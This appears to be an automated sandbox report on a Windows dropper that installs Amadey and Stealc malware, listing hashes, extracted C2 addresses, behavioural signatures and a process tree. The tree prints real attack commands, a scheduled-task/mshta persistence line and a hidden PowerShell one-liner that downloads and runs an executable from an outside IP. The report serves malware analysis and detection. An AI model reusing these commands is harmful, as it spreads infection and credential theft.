Analysis

  • max time kernel
    143s
  • max time network
    149s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    25-01-2025 12:59

General

  • Target

    c21653cb2ecc86d7eabf5f6c30a2a4bbf63c1f443d9e2c4983906ff61c1f0fd3.exe

  • Size

    5.7MB

  • MD5

    be4aa0e2805e40c4f8789a1528365dd1

  • SHA1

    0148f94dc87cfe4f6c7bc3926973cc6f983005eb

  • SHA256

    c21653cb2ecc86d7eabf5f6c30a2a4bbf63c1f443d9e2c4983906ff61c1f0fd3

  • SHA512

    bd31bf5f2b97af7ec8e2d54cf0b13ca62184c7fcb76b79eb9e3adaf95b8788e8823627910abb117d363f94ebe550d55b1116fee3aade4aae36b01a12735c1f0b

  • SSDEEP

    98304:+dgU5kV7piyehY9+KG3GkXTYnYKymXfQpiCDK9MQMho5vO4MiD5zufa3SKEpAPrK:+dFeVjeh4PaRkhX4Vm9MQ2o5IpfUSKlW

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://185.215.113.16/defend/random.exe

Extracted

Family

amadey

Version

4.42

Botnet

9c9aa5

C2

http://185.215.113.43

Attributes
  • install_dir

    abc3bc1985

  • install_file

    skotes.exe

  • strings_key

    8a35cf2ea38c2817dba29a4b5b25dcf0

  • url_paths

    /Zu7JuNko/index.php

rc4.plain

Extracted

Family

stealc

Botnet

brat

C2

http://185.215.113.206

Attributes
  • url_path

    /c4becf79229cb002.php

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • Stealc

    Stealc is an infostealer written in C++.

  • Stealc family
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 4 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Using powershell.exe command.

  • Checks BIOS information in registry 2 TTPs 8 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 3 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 7 IoCs
  • Identifies Wine through registry keys 2 TTPs 4 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Adds Run key to start application 2 TTPs 3 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 8 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 18 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of WriteProcessMemory 43 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\c21653cb2ecc86d7eabf5f6c30a2a4bbf63c1f443d9e2c4983906ff61c1f0fd3.exe
    "C:\Users\Admin\AppData\Local\Temp\c21653cb2ecc86d7eabf5f6c30a2a4bbf63c1f443d9e2c4983906ff61c1f0fd3.exe"
    1⤵
    • Adds Run key to start application
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:2524
    • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Z3c83.exe
      C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Z3c83.exe
      2⤵
      • Executes dropped EXE
      • Adds Run key to start application
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:5108
      • C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a3e02.exe
        C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a3e02.exe
        3⤵
        • Executes dropped EXE
        • Adds Run key to start application
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:4424
        • C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1S33T6.exe
          C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1S33T6.exe
          4⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Checks computer location settings
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Drops file in Windows directory
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of WriteProcessMemory
          PID:2320
          • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
            "C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"
            5⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Checks BIOS information in registry
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            PID:3708
        • C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\2f6885.exe
          C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\2f6885.exe
          4⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          PID:4164
      • C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\3g55r.exe
        C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\3g55r.exe
        3⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Identifies Wine through registry keys
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • System Location Discovery: System Language Discovery
        • Checks processor information in registry
        • Suspicious behavior: EnumeratesProcesses
        PID:3320
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 3320 -s 1532
          4⤵
          • Program crash
          PID:4976
    • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\4u451e.exe
      C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\4u451e.exe
      2⤵
      • Checks computer location settings
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:4188
      • C:\Windows\system32\cmd.exe
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\1D37.tmp\1D38.tmp\1D39.bat C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\4u451e.exe"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4432
        • C:\Windows\system32\timeout.exe
          timeout /t 2
          4⤵
          • Delays execution with timeout.exe
          PID:4060
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:4592
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1908
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:4300
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:4284
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1204
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:4392
        • C:\Windows\system32\schtasks.exe
          schtasks /create /tn "IVsbnmaP8yJ" /tr "mshta \"C:\Temp\B58GnpT0l.hta\"" /sc minute /mo 60 /ru "Admin" /f
          4⤵
          • Scheduled Task/Job: Scheduled Task
          PID:1384
        • C:\Windows\system32\mshta.exe
          mshta "C:\Temp\B58GnpT0l.hta"
          4⤵
          • Checks computer location settings
          • Suspicious use of WriteProcessMemory
          PID:1220
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;
            5⤵
            • Blocklisted process makes network request
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1240
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3320 -ip 3320
    1⤵
      PID:208

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Temp\B58GnpT0l.hta

      Filesize

      796B

      MD5

      a59eb779137c2c4364c86d9e4838abc2

      SHA1

      7bc963e54c2aed1313d5ee4ab6a0d4904e02a664

      SHA256

      2e50bd0045293c0e6939300956d3cbdabcf16634fcb72412f78f65eb9acc76bc

      SHA512

      d847d279e1b006c045674b27129a49aa7c6f6591504b34777e09e690032a7407fca3ac9612f080802023a15dddd92a61eebe5e1b7ecf0b2113e611933ce74c6c

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

      Filesize

      2KB

      MD5

      2f57fde6b33e89a63cf0dfdd6e60a351

      SHA1

      445bf1b07223a04f8a159581a3d37d630273010f

      SHA256

      3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55

      SHA512

      42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      1KB

      MD5

      38e01d05f1a3c204a4b66f6503a154b4

      SHA1

      1f13df998e49ba099b8142117047ca78c7728826

      SHA256

      098383f853295ab4ca31292fc72f149c4d737544f973232a84f48ba060076610

      SHA512

      d4cf12cc636128328bca08bfefdb5cbd3d7e3fa0b9ab8de99734a9af67c18224146000e2a5b79ad3fcfbcef27290e93fcd8f9c0979c8dd95e47e123b479cbed5

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      1KB

      MD5

      e5bfec1063a497048fffb231a0621403

      SHA1

      97cf6a89f237f43b9c22e3e081f7d45924d435ba

      SHA256

      325d1ffa65e9593a834f3662168d0c1950de148c63f1e43b86727087f3881d6f

      SHA512

      e38c5189054cf09fb15de017d0bbe226338124ee02bb04530943c8fcfc303dbe5fe5fd28c9c1aea1b552d1a2b0b76cabbedd284a38a07d41ec9cf9e55b44dd0e

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      1KB

      MD5

      e89c193840c8fb53fc3de104b1c4b092

      SHA1

      8b41b6a392780e48cc33e673cf4412080c42981e

      SHA256

      920b0533da0c372d9d48d36e09d752c369aec8f67c334e98940909bfcb6c0e6c

      SHA512

      865667a22e741c738c62582f0f06ea4559bb63a1f0410065c6fb3da80667582697aba2e233e91068c02d9ab4fb5db282a681fe8234f4c77a5309b689a37ac3a2

    • C:\Users\Admin\AppData\Local\Temp\1D37.tmp\1D38.tmp\1D39.bat

      Filesize

      2KB

      MD5

      18283422f83c1ac93981ad87b116aaaa

      SHA1

      397308fcc63eef6bdccada1b6bd8ae5d37e81482

      SHA256

      1573a145edf52b446401eea1fdeafcd48b6ecaf3f4bbb4a594a73b921ee02873

      SHA512

      0892532063016e7603f5dec85fbbe3a2aff5c4d0d17079c41ec23640c95c53e27d4bb7f886b4ea79a797db4e9b805cb411996fb0a9c32e5efb1948775388c42e

    • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\4u451e.exe

      Filesize

      89KB

      MD5

      dd8a70b0cd685a75b6d50d4728b7cbed

      SHA1

      921e8e09d89c78995c187c6dca5d9bdb0c9d7786

      SHA256

      b7716725433b4d1feb8312fce0fdf422b35bb3e8388faed734dcf3ace9d0c573

      SHA512

      25ca48bd870cf65b1d982de0b2790e4d54ba55a87d997ddae61e546eb640b6131f3b3ea18f4e5b510733fc1f16cac4ce739ee42c44c1d695220857f63913fd7b

    • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Z3c83.exe

      Filesize

      5.6MB

      MD5

      698c74a091fa24462b7a01960ddb407c

      SHA1

      366b7d020a54b5badcbd5d7437f51f2345c70302

      SHA256

      99a4cd7b4ce889f6744419cd2ebf04f1cb9969eed52bc885d4166447bfdae73e

      SHA512

      d8a3340737b080a005b08b1bdf07b65393ee87c8bb62e63edbef3c625fe6fb02115677e903f3704650a961bb61bbcc5cf95fc337957c45da87dbe0e30b2c007d

    • C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\3g55r.exe

      Filesize

      1.7MB

      MD5

      53e4443bfc0afb8507d218fb8eed9136

      SHA1

      47dc854edb46c307ab847657ea00b3a4fc33f9f7

      SHA256

      36d443642e6569019baecbc6c288be4a4619b1eecb30f4f394e99b227c49b390

      SHA512

      0e187c2fbaeed0fd6c7a254f9cdbf247aa46cd9c11300c8a47fc18b9a03f444f21f015380fa763778ac0d42ae8f2f959cc088fa7ba03a53e9813ae15a6b40458

    • C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a3e02.exe

      Filesize

      3.8MB

      MD5

      2860fad6691741d87821345ad05e7ede

      SHA1

      7f95d0e07c77ba5932c5cb30f486807db4e28a51

      SHA256

      7a0bb0477e05df4292b21a55a92cace21ed88aadb10ab348f31a731cc5d0115e

      SHA512

      522d740b184b47e58a72ca8aff48c678c11f5ef167e2a9746f61fb91c29f709a6f97f9361a9adcb5df275d70667b16714b427e4d1ecff15023e9674e400d8d12

    • C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1S33T6.exe

      Filesize

      1.9MB

      MD5

      76c85bc5e884e7df3261781a0f893d4d

      SHA1

      213b589a7107d03b086ebf4b8cd781997cf2364b

      SHA256

      d8085796905f806697c8dea97279b5759d5169147b6bc733e20a900364d52805

      SHA512

      3aee55250c1ec9fbba19596ab89fbe4141f396e7f8bd1e8a53465c0aea4733f8d05ccaf815a394b7e686f34ad40164456cd423f9ee7ddb2c03a6a7b6c90f0088

    • C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\2f6885.exe

      Filesize

      1.8MB

      MD5

      63f9ede65bc52f8c4ac006255edf812b

      SHA1

      f1649a7d7b16d5a7acdcc64cffa5b55840cd50f5

      SHA256

      dcb50e40256c682969a4136ca42297c18cf5a588cb19b7539353b9f86337fc30

      SHA512

      c0388b91a420bf1b71a089692f8c35f2cfa16b7c2f5d4f20c4412e2835397eba27e2cfd13b16b73f5d0f9cea8f5fb642cb7dbcfc6707df63992165cf3f0c8acc

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ad4o2fpr.jnl.ps1

      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • memory/1908-67-0x00000294EDFA0000-0x00000294EDFC2000-memory.dmp

      Filesize

      136KB

    • memory/2320-21-0x0000000000C00000-0x00000000010D6000-memory.dmp

      Filesize

      4.8MB

    • memory/2320-35-0x0000000000C00000-0x00000000010D6000-memory.dmp

      Filesize

      4.8MB

    • memory/3320-47-0x0000000000CE0000-0x0000000001377000-memory.dmp

      Filesize

      6.6MB

    • memory/3320-51-0x0000000000CE0000-0x0000000001377000-memory.dmp

      Filesize

      6.6MB

    • memory/3320-50-0x0000000000CE0000-0x0000000001377000-memory.dmp

      Filesize

      6.6MB

    • memory/3320-48-0x0000000000CE0000-0x0000000001377000-memory.dmp

      Filesize

      6.6MB

    • memory/3320-43-0x0000000000CE0000-0x0000000001377000-memory.dmp

      Filesize

      6.6MB

    • memory/3708-49-0x0000000000980000-0x0000000000E56000-memory.dmp

      Filesize

      4.8MB

    • memory/3708-109-0x0000000000980000-0x0000000000E56000-memory.dmp

      Filesize

      4.8MB

    • memory/3708-117-0x0000000000980000-0x0000000000E56000-memory.dmp

      Filesize

      4.8MB

    • memory/3708-33-0x0000000000980000-0x0000000000E56000-memory.dmp

      Filesize

      4.8MB

    • memory/3708-46-0x0000000000980000-0x0000000000E56000-memory.dmp

      Filesize

      4.8MB

    • memory/3708-45-0x0000000000980000-0x0000000000E56000-memory.dmp

      Filesize

      4.8MB

    • memory/3708-116-0x0000000000980000-0x0000000000E56000-memory.dmp

      Filesize

      4.8MB

    • memory/3708-106-0x0000000000980000-0x0000000000E56000-memory.dmp

      Filesize

      4.8MB

    • memory/3708-107-0x0000000000980000-0x0000000000E56000-memory.dmp

      Filesize

      4.8MB

    • memory/3708-55-0x0000000000980000-0x0000000000E56000-memory.dmp

      Filesize

      4.8MB

    • memory/3708-110-0x0000000000980000-0x0000000000E56000-memory.dmp

      Filesize

      4.8MB

    • memory/3708-111-0x0000000000980000-0x0000000000E56000-memory.dmp

      Filesize

      4.8MB

    • memory/3708-112-0x0000000000980000-0x0000000000E56000-memory.dmp

      Filesize

      4.8MB

    • memory/3708-113-0x0000000000980000-0x0000000000E56000-memory.dmp

      Filesize

      4.8MB

    • memory/3708-114-0x0000000000980000-0x0000000000E56000-memory.dmp

      Filesize

      4.8MB

    • memory/3708-115-0x0000000000980000-0x0000000000E56000-memory.dmp

      Filesize

      4.8MB

    • memory/4164-40-0x0000000000600000-0x0000000000AB7000-memory.dmp

      Filesize

      4.7MB

    • memory/4164-39-0x0000000000600000-0x0000000000AB7000-memory.dmp

      Filesize

      4.7MB